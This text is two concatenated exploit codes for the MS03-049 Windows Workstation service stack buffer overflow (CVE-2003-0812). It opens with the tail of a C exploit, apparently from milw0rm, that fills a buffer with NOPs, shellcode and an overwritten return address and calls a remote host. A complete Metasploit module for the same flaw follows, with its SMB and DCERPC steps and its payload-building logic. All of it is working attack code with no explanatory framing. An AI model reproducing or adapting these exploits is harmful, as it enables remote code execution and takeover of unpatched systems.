fprintf(stderr, "[-] LoadLibrary failed\n"); return 1; } procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you tocheck NetAddAlternateComputerName if (procAddress == NULL) { fprintf(stderr, "[-] GetProcAddress failed\n"); return 1; } memset(szBuffer, 0x90, sizeof(szBuffer)); memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1); // ebp @ &szBuffer[2013] *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, useopcode search engine for more, but // be aware that a call esp willchange the offset in the stack) memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0); WNetCancelConnection2("\\\\192.168.175.3\\ipc$", 0, TRUE); FreeLibrary(hInstance); return 0; } // milw0rm.com [2003-11-12]

## # $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2003-0812' ], [ 'OSVDB', '11461' ], [ 'BID', '9011' ], [ 'MSB', 'MS03-049' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'), 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, 'Targets' => [ [ 'Windows XP SP0/SP1', { 'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll } ], ], 'DisclosureDate' => 'Nov 11 2003')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']), ], self.class) end def exploit connect() smb_login() handle = dcerpc_handle( '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status("Building the stub data...") name = rand_text_alphanumeric(5000) name[3496, 4] = [target.ret].pack('V') name[3492, 2] = "\xeb\x06" name[3500, 5] = "\xe9" + [-3505].pack('V') name[0, payload.encoded.length] = payload.encoded stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString(name) + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.long(0) + NDR.long(0) print_status("Calling the vulnerable function...") begin dcerpc.call(0x1b, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/ raise e end end # Cleanup handler disconnect end end